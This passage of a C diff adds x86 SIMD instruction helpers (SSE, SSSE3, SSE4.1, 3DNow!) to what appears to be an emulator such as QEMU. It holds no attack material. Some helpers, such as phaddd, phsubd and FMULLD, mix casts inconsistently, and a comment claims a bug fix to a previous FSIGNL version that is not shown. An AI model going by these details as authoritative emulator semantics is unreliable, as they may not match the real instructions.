+SSE_HELPER_CMP(cmpnlt, FPU_CMPNLT) +SSE_HELPER_CMP(cmpnle, FPU_CMPNLE) +SSE_HELPER_CMP(cmpord, FPU_CMPORD) + +static const int comis_eflags[4] = {CC_C, CC_Z, 0, CC_Z | CC_P | CC_C}; + +void helper_ucomiss(CPUX86State *env, Reg *d, Reg *s) +{ + int ret; + float32 s0, s1; + + s0 = d->XMM_S(0); + s1 = s->XMM_S(0); + ret = float32_compare_quiet(s0, s1, &env->sse_status); + CC_SRC = comis_eflags[ret + 1]; +} + +void helper_comiss(CPUX86State *env, Reg *d, Reg *s) +{ + int ret; + float32 s0, s1; + + s0 = d->XMM_S(0); + s1 = s->XMM_S(0); + ret = float32_compare(s0, s1, &env->sse_status); + CC_SRC = comis_eflags[ret + 1]; +} + +void helper_ucomisd(CPUX86State *env, Reg *d, Reg *s) +{ + int ret; + float64 d0, d1; + + d0 = d->XMM_D(0); + d1 = s->XMM_D(0); + ret = float64_compare_quiet(d0, d1, &env->sse_status); + CC_SRC = comis_eflags[ret + 1]; +} + +void helper_comisd(CPUX86State *env, Reg *d, Reg *s) +{ + int ret; + float64 d0, d1; + + d0 = d->XMM_D(0); + d1 = s->XMM_D(0); + ret = float64_compare(d0, d1, &env->sse_status); + CC_SRC = comis_eflags[ret + 1]; +} + +uint32_t helper_movmskps(CPUX86State *env, Reg *s) +{ + int b0, 
b1, b2, b3; + + b0 = s->XMM_L(0) >> 31; + b1 = s->XMM_L(1) >> 31; + b2 = s->XMM_L(2) >> 31; + b3 = s->XMM_L(3) >> 31; + return b0 | (b1 << 1) | (b2 << 2) | (b3 << 3); +} + +uint32_t helper_movmskpd(CPUX86State *env, Reg *s) +{ + int b0, b1; + + b0 = s->XMM_L(1) >> 31; + b1 = s->XMM_L(3) >> 31; + return b0 | (b1 << 1); +} + +#endif + +uint32_t glue(helper_pmovmskb, SUFFIX)(CPUX86State *env, Reg *s) +{ + uint32_t val; + + val = 0; + val |= (s->B(0) >> 7); + val |= (s->B(1) >> 6) & 0x02; + val |= (s->B(2) >> 5) & 0x04; + val |= (s->B(3) >> 4) & 0x08; + val |= (s->B(4) >> 3) & 0x10; + val |= (s->B(5) >> 2) & 0x20; + val |= (s->B(6) >> 1) & 0x40; + val |= (s->B(7)) & 0x80; +#if SHIFT == 1 + val |= (s->B(8) << 1) & 0x0100; + val |= (s->B(9) << 2) & 0x0200; + val |= (s->B(10) << 3) & 0x0400; + val |= (s->B(11) << 4) & 0x0800; + val |= (s->B(12) << 5) & 0x1000; + val |= (s->B(13) << 6) & 0x2000; + val |= (s->B(14) << 7) & 0x4000; + val |= (s->B(15) << 8) & 0x8000; +#endif + return val; +} + +void glue(helper_packsswb, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + Reg r; + + r.B(0) = satsb((int16_t)d->W(0)); + r.B(1) = satsb((int16_t)d->W(1)); + r.B(2) = satsb((int16_t)d->W(2)); + r.B(3) = satsb((int16_t)d->W(3)); +#if SHIFT == 1 + r.B(4) = satsb((int16_t)d->W(4)); + r.B(5) = satsb((int16_t)d->W(5)); + r.B(6) = satsb((int16_t)d->W(6)); + r.B(7) = satsb((int16_t)d->W(7)); +#endif + r.B((4 << SHIFT) + 0) = satsb((int16_t)s->W(0)); + r.B((4 << SHIFT) + 1) = satsb((int16_t)s->W(1)); + r.B((4 << SHIFT) + 2) = satsb((int16_t)s->W(2)); + r.B((4 << SHIFT) + 3) = satsb((int16_t)s->W(3)); +#if SHIFT == 1 + r.B(12) = satsb((int16_t)s->W(4)); + r.B(13) = satsb((int16_t)s->W(5)); + r.B(14) = satsb((int16_t)s->W(6)); + r.B(15) = satsb((int16_t)s->W(7)); +#endif + *d = r; +} + +void glue(helper_packuswb, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + Reg r; + + r.B(0) = satub((int16_t)d->W(0)); + r.B(1) = satub((int16_t)d->W(1)); + r.B(2) = satub((int16_t)d->W(2)); + r.B(3) = 
satub((int16_t)d->W(3)); +#if SHIFT == 1 + r.B(4) = satub((int16_t)d->W(4)); + r.B(5) = satub((int16_t)d->W(5)); + r.B(6) = satub((int16_t)d->W(6)); + r.B(7) = satub((int16_t)d->W(7)); +#endif + r.B((4 << SHIFT) + 0) = satub((int16_t)s->W(0)); + r.B((4 << SHIFT) + 1) = satub((int16_t)s->W(1)); + r.B((4 << SHIFT) + 2) = satub((int16_t)s->W(2)); + r.B((4 << SHIFT) + 3) = satub((int16_t)s->W(3)); +#if SHIFT == 1 + r.B(12) = satub((int16_t)s->W(4)); + r.B(13) = satub((int16_t)s->W(5)); + r.B(14) = satub((int16_t)s->W(6)); + r.B(15) = satub((int16_t)s->W(7)); +#endif + *d = r; +} + +void glue(helper_packssdw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + Reg r; + + r.W(0) = satsw(d->L(0)); + r.W(1) = satsw(d->L(1)); +#if SHIFT == 1 + r.W(2) = satsw(d->L(2)); + r.W(3) = satsw(d->L(3)); +#endif + r.W((2 << SHIFT) + 0) = satsw(s->L(0)); + r.W((2 << SHIFT) + 1) = satsw(s->L(1)); +#if SHIFT == 1 + r.W(6) = satsw(s->L(2)); + r.W(7) = satsw(s->L(3)); +#endif + *d = r; +} + +#define UNPCK_OP(base_name, base) \ + \ + void glue(helper_punpck ## base_name ## bw, SUFFIX)(CPUX86State *env,\ + Reg *d, Reg *s) \ + { \ + Reg r; \ + \ + r.B(0) = d->B((base << (SHIFT + 2)) + 0); \ + r.B(1) = s->B((base << (SHIFT + 2)) + 0); \ + r.B(2) = d->B((base << (SHIFT + 2)) + 1); \ + r.B(3) = s->B((base << (SHIFT + 2)) + 1); \ + r.B(4) = d->B((base << (SHIFT + 2)) + 2); \ + r.B(5) = s->B((base << (SHIFT + 2)) + 2); \ + r.B(6) = d->B((base << (SHIFT + 2)) + 3); \ + r.B(7) = s->B((base << (SHIFT + 2)) + 3); \ + XMM_ONLY( \ + r.B(8) = d->B((base << (SHIFT + 2)) + 4); \ + r.B(9) = s->B((base << (SHIFT + 2)) + 4); \ + r.B(10) = d->B((base << (SHIFT + 2)) + 5); \ + r.B(11) = s->B((base << (SHIFT + 2)) + 5); \ + r.B(12) = d->B((base << (SHIFT + 2)) + 6); \ + r.B(13) = s->B((base << (SHIFT + 2)) + 6); \ + r.B(14) = d->B((base << (SHIFT + 2)) + 7); \ + r.B(15) = s->B((base << (SHIFT + 2)) + 7); \ + ) \ + *d = r; \ + } \ + \ + void glue(helper_punpck ## base_name ## wd, SUFFIX)(CPUX86State *env,\ + Reg *d, 
Reg *s) \ + { \ + Reg r; \ + \ + r.W(0) = d->W((base << (SHIFT + 1)) + 0); \ + r.W(1) = s->W((base << (SHIFT + 1)) + 0); \ + r.W(2) = d->W((base << (SHIFT + 1)) + 1); \ + r.W(3) = s->W((base << (SHIFT + 1)) + 1); \ + XMM_ONLY( \ + r.W(4) = d->W((base << (SHIFT + 1)) + 2); \ + r.W(5) = s->W((base << (SHIFT + 1)) + 2); \ + r.W(6) = d->W((base << (SHIFT + 1)) + 3); \ + r.W(7) = s->W((base << (SHIFT + 1)) + 3); \ + ) \ + *d = r; \ + } \ + \ + void glue(helper_punpck ## base_name ## dq, SUFFIX)(CPUX86State *env,\ + Reg *d, Reg *s) \ + { \ + Reg r; \ + \ + r.L(0) = d->L((base << SHIFT) + 0); \ + r.L(1) = s->L((base << SHIFT) + 0); \ + XMM_ONLY( \ + r.L(2) = d->L((base << SHIFT) + 1); \ + r.L(3) = s->L((base << SHIFT) + 1); \ + ) \ + *d = r; \ + } \ + \ + XMM_ONLY( \ + void glue(helper_punpck ## base_name ## qdq, SUFFIX)(CPUX86State \ + *env, \ + Reg *d, \ + Reg *s) \ + { \ + Reg r; \ + \ + r.Q(0) = d->Q(base); \ + r.Q(1) = s->Q(base); \ + *d = r; \ + } \ + ) + +UNPCK_OP(l, 0) +UNPCK_OP(h, 1) + +/* 3DNow! 
float ops */ +#if SHIFT == 0 +void helper_pi2fd(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_S(0) = int32_to_float32(s->MMX_L(0), &env->mmx_status); + d->MMX_S(1) = int32_to_float32(s->MMX_L(1), &env->mmx_status); +} + +void helper_pi2fw(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_S(0) = int32_to_float32((int16_t)s->MMX_W(0), &env->mmx_status); + d->MMX_S(1) = int32_to_float32((int16_t)s->MMX_W(2), &env->mmx_status); +} + +void helper_pf2id(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_L(0) = float32_to_int32_round_to_zero(s->MMX_S(0), &env->mmx_status); + d->MMX_L(1) = float32_to_int32_round_to_zero(s->MMX_S(1), &env->mmx_status); +} + +void helper_pf2iw(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_L(0) = satsw(float32_to_int32_round_to_zero(s->MMX_S(0), + &env->mmx_status)); + d->MMX_L(1) = satsw(float32_to_int32_round_to_zero(s->MMX_S(1), + &env->mmx_status)); +} + +void helper_pfacc(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + MMXReg r; + + r.MMX_S(0) = float32_add(d->MMX_S(0), d->MMX_S(1), &env->mmx_status); + r.MMX_S(1) = float32_add(s->MMX_S(0), s->MMX_S(1), &env->mmx_status); + *d = r; +} + +void helper_pfadd(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_S(0) = float32_add(d->MMX_S(0), s->MMX_S(0), &env->mmx_status); + d->MMX_S(1) = float32_add(d->MMX_S(1), s->MMX_S(1), &env->mmx_status); +} + +void helper_pfcmpeq(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_L(0) = float32_eq_quiet(d->MMX_S(0), s->MMX_S(0), + &env->mmx_status) ? -1 : 0; + d->MMX_L(1) = float32_eq_quiet(d->MMX_S(1), s->MMX_S(1), + &env->mmx_status) ? -1 : 0; +} + +void helper_pfcmpge(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_L(0) = float32_le(s->MMX_S(0), d->MMX_S(0), + &env->mmx_status) ? -1 : 0; + d->MMX_L(1) = float32_le(s->MMX_S(1), d->MMX_S(1), + &env->mmx_status) ? -1 : 0; +} + +void helper_pfcmpgt(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_L(0) = float32_lt(s->MMX_S(0), d->MMX_S(0), + &env->mmx_status) ? 
-1 : 0; + d->MMX_L(1) = float32_lt(s->MMX_S(1), d->MMX_S(1), + &env->mmx_status) ? -1 : 0; +} + +void helper_pfmax(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + if (float32_lt(d->MMX_S(0), s->MMX_S(0), &env->mmx_status)) { + d->MMX_S(0) = s->MMX_S(0); + } + if (float32_lt(d->MMX_S(1), s->MMX_S(1), &env->mmx_status)) { + d->MMX_S(1) = s->MMX_S(1); + } +} + +void helper_pfmin(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + if (float32_lt(s->MMX_S(0), d->MMX_S(0), &env->mmx_status)) { + d->MMX_S(0) = s->MMX_S(0); + } + if (float32_lt(s->MMX_S(1), d->MMX_S(1), &env->mmx_status)) { + d->MMX_S(1) = s->MMX_S(1); + } +} + +void helper_pfmul(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_S(0) = float32_mul(d->MMX_S(0), s->MMX_S(0), &env->mmx_status); + d->MMX_S(1) = float32_mul(d->MMX_S(1), s->MMX_S(1), &env->mmx_status); +} + +void helper_pfnacc(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + MMXReg r; + + r.MMX_S(0) = float32_sub(d->MMX_S(0), d->MMX_S(1), &env->mmx_status); + r.MMX_S(1) = float32_sub(s->MMX_S(0), s->MMX_S(1), &env->mmx_status); + *d = r; +} + +void helper_pfpnacc(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + MMXReg r; + + r.MMX_S(0) = float32_sub(d->MMX_S(0), d->MMX_S(1), &env->mmx_status); + r.MMX_S(1) = float32_add(s->MMX_S(0), s->MMX_S(1), &env->mmx_status); + *d = r; +} + +void helper_pfrcp(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_S(0) = float32_div(float32_one, s->MMX_S(0), &env->mmx_status); + d->MMX_S(1) = d->MMX_S(0); +} + +void helper_pfrsqrt(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_L(1) = s->MMX_L(0) & 0x7fffffff; + d->MMX_S(1) = float32_div(float32_one, + float32_sqrt(d->MMX_S(1), &env->mmx_status), + &env->mmx_status); + d->MMX_L(1) |= s->MMX_L(0) & 0x80000000; + d->MMX_L(0) = d->MMX_L(1); +} + +void helper_pfsub(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_S(0) = float32_sub(d->MMX_S(0), s->MMX_S(0), &env->mmx_status); + d->MMX_S(1) = float32_sub(d->MMX_S(1), s->MMX_S(1), &env->mmx_status); +} + +void 
helper_pfsubr(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_S(0) = float32_sub(s->MMX_S(0), d->MMX_S(0), &env->mmx_status); + d->MMX_S(1) = float32_sub(s->MMX_S(1), d->MMX_S(1), &env->mmx_status); +} + +void helper_pswapd(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + MMXReg r; + + r.MMX_L(0) = s->MMX_L(1); + r.MMX_L(1) = s->MMX_L(0); + *d = r; +} +#endif + +/* SSSE3 op helpers */ +void glue(helper_pshufb, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int i; + Reg r; + + for (i = 0; i < (8 << SHIFT); i++) { + r.B(i) = (s->B(i) & 0x80) ? 0 : (d->B(s->B(i) & ((8 << SHIFT) - 1))); + } + + *d = r; +} + +void glue(helper_phaddw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->W(0) = (int16_t)d->W(0) + (int16_t)d->W(1); + d->W(1) = (int16_t)d->W(2) + (int16_t)d->W(3); + XMM_ONLY(d->W(2) = (int16_t)d->W(4) + (int16_t)d->W(5)); + XMM_ONLY(d->W(3) = (int16_t)d->W(6) + (int16_t)d->W(7)); + d->W((2 << SHIFT) + 0) = (int16_t)s->W(0) + (int16_t)s->W(1); + d->W((2 << SHIFT) + 1) = (int16_t)s->W(2) + (int16_t)s->W(3); + XMM_ONLY(d->W(6) = (int16_t)s->W(4) + (int16_t)s->W(5)); + XMM_ONLY(d->W(7) = (int16_t)s->W(6) + (int16_t)s->W(7)); +} + +void glue(helper_phaddd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->L(0) = (int64_t)d->L(0) + (int32_t)d->L(1); + XMM_ONLY(d->L(1) = (int32_t)d->L(2) + (int32_t)d->L(3)); + d->L((1 << SHIFT) + 0) = (uint32_t)((int32_t)s->L(0) + (uint32_t)s->L(1)); + XMM_ONLY(d->L(3) = (int32_t)s->L(2) + (int32_t)s->L(3)); +} + +void glue(helper_phaddsw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->W(0) = satsw((int16_t)d->W(0) + (int16_t)d->W(1)); + d->W(1) = satsw((int16_t)d->W(2) + (int16_t)d->W(3)); + XMM_ONLY(d->W(2) = satsw((int16_t)d->W(4) + (int16_t)d->W(5))); + XMM_ONLY(d->W(3) = satsw((int16_t)d->W(6) + (int16_t)d->W(7))); + d->W((2 << SHIFT) + 0) = satsw((int16_t)s->W(0) + (int16_t)s->W(1)); + d->W((2 << SHIFT) + 1) = satsw((int16_t)s->W(2) + (int16_t)s->W(3)); + XMM_ONLY(d->W(6) = satsw((int16_t)s->W(4) + (int16_t)s->W(5))); + 
XMM_ONLY(d->W(7) = satsw((int16_t)s->W(6) + (int16_t)s->W(7))); +} + +void glue(helper_pmaddubsw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->W(0) = satsw((int8_t)s->B(0) * (uint8_t)d->B(0) + + (int8_t)s->B(1) * (uint8_t)d->B(1)); + d->W(1) = satsw((int8_t)s->B(2) * (uint8_t)d->B(2) + + (int8_t)s->B(3) * (uint8_t)d->B(3)); + d->W(2) = satsw((int8_t)s->B(4) * (uint8_t)d->B(4) + + (int8_t)s->B(5) * (uint8_t)d->B(5)); + d->W(3) = satsw((int8_t)s->B(6) * (uint8_t)d->B(6) + + (int8_t)s->B(7) * (uint8_t)d->B(7)); +#if SHIFT == 1 + d->W(4) = satsw((int8_t)s->B(8) * (uint8_t)d->B(8) + + (int8_t)s->B(9) * (uint8_t)d->B(9)); + d->W(5) = satsw((int8_t)s->B(10) * (uint8_t)d->B(10) + + (int8_t)s->B(11) * (uint8_t)d->B(11)); + d->W(6) = satsw((int8_t)s->B(12) * (uint8_t)d->B(12) + + (int8_t)s->B(13) * (uint8_t)d->B(13)); + d->W(7) = satsw((int8_t)s->B(14) * (uint8_t)d->B(14) + + (int8_t)s->B(15) * (uint8_t)d->B(15)); +#endif +} + +void glue(helper_phsubw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->W(0) = (int16_t)d->W(0) - (int16_t)d->W(1); + d->W(1) = (int16_t)d->W(2) - (int16_t)d->W(3); + XMM_ONLY(d->W(2) = (int16_t)d->W(4) - (int16_t)d->W(5)); + XMM_ONLY(d->W(3) = (int16_t)d->W(6) - (int16_t)d->W(7)); + d->W((2 << SHIFT) + 0) = (int16_t)s->W(0) - (int16_t)s->W(1); + d->W((2 << SHIFT) + 1) = (int16_t)s->W(2) - (int16_t)s->W(3); + XMM_ONLY(d->W(6) = (int16_t)s->W(4) - (int16_t)s->W(5)); + XMM_ONLY(d->W(7) = (int16_t)s->W(6) - (int16_t)s->W(7)); +} + +void glue(helper_phsubd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->L(0) = (int32_t)((int64_t)d->L(0) - (int64_t)d->L(1)); + XMM_ONLY(d->L(1) = (int32_t)((int64_t)d->L(2) - (int64_t)d->L(3))); + d->L((1 << SHIFT) + 0) = (uint32_t)((int64_t)s->L(0) - (int64_t)s->L(1)); + XMM_ONLY(d->L(3) = (int32_t)s->L(2) - (int32_t)s->L(3)); +} + +void glue(helper_phsubsw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->W(0) = satsw((int16_t)d->W(0) - (int16_t)d->W(1)); + d->W(1) = satsw((int16_t)d->W(2) - (int16_t)d->W(3)); 
+    XMM_ONLY(d->W(2) = satsw((int16_t)d->W(4) - (int16_t)d->W(5)));
+    XMM_ONLY(d->W(3) = satsw((int16_t)d->W(6) - (int16_t)d->W(7)));
+    d->W((2 << SHIFT) + 0) = satsw((int16_t)s->W(0) - (int16_t)s->W(1));
+    d->W((2 << SHIFT) + 1) = satsw((int16_t)s->W(2) - (int16_t)s->W(3));
+    XMM_ONLY(d->W(6) = satsw((int16_t)s->W(4) - (int16_t)s->W(5)));
+    XMM_ONLY(d->W(7) = satsw((int16_t)s->W(6) - (int16_t)s->W(7)));
+}
+
+/* PABSB/W/D: per-element absolute value.  Elements arrive unsigned, so
+ * "x > INTn_MAX" tests the sign bit.  The extra x != 0x80000000 guard
+ * in FABSL avoids negating INT32_MIN (signed overflow); INT32_MIN maps
+ * to itself, matching the instruction's wrap-around behaviour. */
+#define FABSB(_, x) (x > INT8_MAX ? -(int8_t)x : x)
+#define FABSW(_, x) (x > INT16_MAX ? -(int16_t)x : x)
+#define FABSL(_, x) ((x > INT32_MAX && x != 0x80000000) ? -(int32_t)x : x)
+SSE_HELPER_B(helper_pabsb, FABSB)
+SSE_HELPER_W(helper_pabsw, FABSW)
+SSE_HELPER_L(helper_pabsd, FABSL)
+
+/* PMULHRSW: signed 16x16 multiply, round, keep bits 16..1. */
+#define FMULHRSW(d, s) (((int16_t) d * (int16_t)s + 0x4000) >> 15)
+SSE_HELPER_W(helper_pmulhrsw, FMULHRSW)
+
+/* PSIGNB/W/D: keep d when s > 0, zero when s == 0, negate d when
+ * s < 0 ("s <= INTn_MAX" tests s >= 0 on the unsigned element).
+ * Bug fix: FSIGNL's positive arm previously computed
+ * "d && d != 0x80000000", storing the boolean 0/1 instead of the
+ * destination element d itself. */
+#define FSIGNB(d, s) (s <= INT8_MAX ? s ? d : 0 : -(int8_t)d)
+#define FSIGNW(d, s) (s <= INT16_MAX ? s ? d : 0 : -(int16_t)d)
+#define FSIGNL(d, s) (s <= INT32_MAX ? s ? d : 0 : -(int32_t)d)
+SSE_HELPER_B(helper_psignb, FSIGNB)
+SSE_HELPER_W(helper_psignw, FSIGNW)
+SSE_HELPER_L(helper_psignd, FSIGNL)
+
+void glue(helper_palignr, SUFFIX)(CPUX86State *env, Reg *d, Reg *s,
+                                  int32_t shift)
+{
+    Reg r;
+
+    /* XXX could be checked during translation */
+    if (shift >= (16 << SHIFT)) {
+        r.Q(0) = 0;
+        XMM_ONLY(r.Q(1) = 0);
+    } else {
+        shift <<= 3;
+#define SHR(v, i) (i < 64 && i > -64 ? i > 0 ?
v >> (i) : (v << -(i)) : 0) +#if SHIFT == 0 + r.Q(0) = SHR(s->Q(0), shift - 0) | + SHR(d->Q(0), shift - 64); +#else + r.Q(0) = SHR(s->Q(0), shift - 0) | + SHR(s->Q(1), shift - 64) | + SHR(d->Q(0), shift - 128) | + SHR(d->Q(1), shift - 192); + r.Q(1) = SHR(s->Q(0), shift + 64) | + SHR(s->Q(1), shift - 0) | + SHR(d->Q(0), shift - 64) | + SHR(d->Q(1), shift - 128); +#endif +#undef SHR + } + + *d = r; +} + +#define XMM0 (env->xmm_regs[0]) + +#if SHIFT == 1 +#define SSE_HELPER_V(name, elem, num, F) \ + void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->elem(0) = F(d->elem(0), s->elem(0), XMM0.elem(0)); \ + d->elem(1) = F(d->elem(1), s->elem(1), XMM0.elem(1)); \ + if (num > 2) { \ + d->elem(2) = F(d->elem(2), s->elem(2), XMM0.elem(2)); \ + d->elem(3) = F(d->elem(3), s->elem(3), XMM0.elem(3)); \ + if (num > 4) { \ + d->elem(4) = F(d->elem(4), s->elem(4), XMM0.elem(4)); \ + d->elem(5) = F(d->elem(5), s->elem(5), XMM0.elem(5)); \ + d->elem(6) = F(d->elem(6), s->elem(6), XMM0.elem(6)); \ + d->elem(7) = F(d->elem(7), s->elem(7), XMM0.elem(7)); \ + if (num > 8) { \ + d->elem(8) = F(d->elem(8), s->elem(8), XMM0.elem(8)); \ + d->elem(9) = F(d->elem(9), s->elem(9), XMM0.elem(9)); \ + d->elem(10) = F(d->elem(10), s->elem(10), XMM0.elem(10)); \ + d->elem(11) = F(d->elem(11), s->elem(11), XMM0.elem(11)); \ + d->elem(12) = F(d->elem(12), s->elem(12), XMM0.elem(12)); \ + d->elem(13) = F(d->elem(13), s->elem(13), XMM0.elem(13)); \ + d->elem(14) = F(d->elem(14), s->elem(14), XMM0.elem(14)); \ + d->elem(15) = F(d->elem(15), s->elem(15), XMM0.elem(15)); \ + } \ + } \ + } \ + } + +#define SSE_HELPER_I(name, elem, num, F) \ + void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t imm) \ + { \ + d->elem(0) = F(d->elem(0), s->elem(0), ((imm >> 0) & 1)); \ + d->elem(1) = F(d->elem(1), s->elem(1), ((imm >> 1) & 1)); \ + if (num > 2) { \ + d->elem(2) = F(d->elem(2), s->elem(2), ((imm >> 2) & 1)); \ + d->elem(3) = F(d->elem(3), s->elem(3), ((imm >> 3) & 1)); \ + if 
(num > 4) { \ + d->elem(4) = F(d->elem(4), s->elem(4), ((imm >> 4) & 1)); \ + d->elem(5) = F(d->elem(5), s->elem(5), ((imm >> 5) & 1)); \ + d->elem(6) = F(d->elem(6), s->elem(6), ((imm >> 6) & 1)); \ + d->elem(7) = F(d->elem(7), s->elem(7), ((imm >> 7) & 1)); \ + if (num > 8) { \ + d->elem(8) = F(d->elem(8), s->elem(8), ((imm >> 8) & 1)); \ + d->elem(9) = F(d->elem(9), s->elem(9), ((imm >> 9) & 1)); \ + d->elem(10) = F(d->elem(10), s->elem(10), \ + ((imm >> 10) & 1)); \ + d->elem(11) = F(d->elem(11), s->elem(11), \ + ((imm >> 11) & 1)); \ + d->elem(12) = F(d->elem(12), s->elem(12), \ + ((imm >> 12) & 1)); \ + d->elem(13) = F(d->elem(13), s->elem(13), \ + ((imm >> 13) & 1)); \ + d->elem(14) = F(d->elem(14), s->elem(14), \ + ((imm >> 14) & 1)); \ + d->elem(15) = F(d->elem(15), s->elem(15), \ + ((imm >> 15) & 1)); \ + } \ + } \ + } \ + } + +/* SSE4.1 op helpers */ +#define FBLENDVB(d, s, m) ((m & 0x80) ? s : d) +#define FBLENDVPS(d, s, m) ((m & 0x80000000) ? s : d) +#define FBLENDVPD(d, s, m) ((m & 0x8000000000000000LL) ? s : d) +SSE_HELPER_V(helper_pblendvb, B, 16, FBLENDVB) +SSE_HELPER_V(helper_blendvps, L, 4, FBLENDVPS) +SSE_HELPER_V(helper_blendvpd, Q, 2, FBLENDVPD) + +void glue(helper_ptest, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + uint64_t zf = (s->Q(0) & d->Q(0)) | (s->Q(1) & d->Q(1)); + uint64_t cf = (s->Q(0) & ~d->Q(0)) | (s->Q(1) & ~d->Q(1)); + + CC_SRC = (zf ? 0 : CC_Z) | (cf ? 
0 : CC_C); +} + +#define SSE_HELPER_F(name, elem, num, F) \ + void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->elem(0) = F(0); \ + d->elem(1) = F(1); \ + if (num > 2) { \ + d->elem(2) = F(2); \ + d->elem(3) = F(3); \ + if (num > 4) { \ + d->elem(4) = F(4); \ + d->elem(5) = F(5); \ + d->elem(6) = F(6); \ + d->elem(7) = F(7); \ + } \ + } \ + } + +SSE_HELPER_F(helper_pmovsxbw, W, 8, (int8_t) s->B) +SSE_HELPER_F(helper_pmovsxbd, L, 4, (int8_t) s->B) +SSE_HELPER_F(helper_pmovsxbq, Q, 2, (int8_t) s->B) +SSE_HELPER_F(helper_pmovsxwd, L, 4, (int16_t) s->W) +SSE_HELPER_F(helper_pmovsxwq, Q, 2, (int16_t) s->W) +SSE_HELPER_F(helper_pmovsxdq, Q, 2, (int32_t) s->L) +SSE_HELPER_F(helper_pmovzxbw, W, 8, s->B) +SSE_HELPER_F(helper_pmovzxbd, L, 4, s->B) +SSE_HELPER_F(helper_pmovzxbq, Q, 2, s->B) +SSE_HELPER_F(helper_pmovzxwd, L, 4, s->W) +SSE_HELPER_F(helper_pmovzxwq, Q, 2, s->W) +SSE_HELPER_F(helper_pmovzxdq, Q, 2, s->L) + +void glue(helper_pmuldq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->Q(0) = (int64_t)(int32_t) d->L(0) * (int32_t) s->L(0); + d->Q(1) = (int64_t)(int32_t) d->L(2) * (int32_t) s->L(2); +} + +#define FCMPEQQ(d, s) (d == s ? 
-1 : 0) +SSE_HELPER_Q(helper_pcmpeqq, FCMPEQQ) + +void glue(helper_packusdw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->W(0) = satuw((int32_t) d->L(0)); + d->W(1) = satuw((int32_t) d->L(1)); + d->W(2) = satuw((int32_t) d->L(2)); + d->W(3) = satuw((int32_t) d->L(3)); + d->W(4) = satuw((int32_t) s->L(0)); + d->W(5) = satuw((int32_t) s->L(1)); + d->W(6) = satuw((int32_t) s->L(2)); + d->W(7) = satuw((int32_t) s->L(3)); +} + +#define FMINSB(d, s) MIN((int8_t)d, (int8_t)s) +#define FMINSD(d, s) MIN((int32_t)d, (int32_t)s) +#define FMAXSB(d, s) MAX((int8_t)d, (int8_t)s) +#define FMAXSD(d, s) MAX((int32_t)d, (int32_t)s) +SSE_HELPER_B(helper_pminsb, FMINSB) +SSE_HELPER_L(helper_pminsd, FMINSD) +SSE_HELPER_W(helper_pminuw, MIN) +SSE_HELPER_L(helper_pminud, MIN) +SSE_HELPER_B(helper_pmaxsb, FMAXSB) +SSE_HELPER_L(helper_pmaxsd, FMAXSD) +SSE_HELPER_W(helper_pmaxuw, MAX) +SSE_HELPER_L(helper_pmaxud, MAX) + +#define FMULLD(d, s) ((int64_t)d * (int32_t)s) +SSE_HELPER_L(helper_pmulld, FMULLD) + +void glue(helper_phminposuw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int idx = 0; + + if (s->W(1) < s->W(idx)) { + idx = 1; + } + if (s->W(2) < s->W(idx)) { + idx = 2; + } + if (s->W(3) < s->W(idx)) { + idx = 3; + } + if (s->W(4) < s->W(idx)) { + idx = 4; + } + if (s->W(5) < s->W(idx)) { + idx = 5; + } + if (s->W(6) < s->W(idx)) { + idx = 6; + } + if (s->W(7) < s->W(idx)) { + idx = 7; + } + + d->Q(1) = 0; + d->L(1) = 0; + d->W(1) = idx; + d->W(0) = s->W(idx); +} + +void glue(helper_roundps, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t mode) +{ + signed char prev_rounding_mode; + + prev_rounding_mode = env->sse_status.float_rounding_mode; + if (!(mode & (1 << 2))) { + switch (mode & 3) { + case 0: + set_float_rounding_mode(float_round_nearest_even, &env->sse_status); + break; + case 1: + set_float_rounding_mode(float_round_down, &env->sse_status); + break; + case 2: + set_float_rounding_mode(float_round_up, &env->sse_status); + break; + case 3: + 
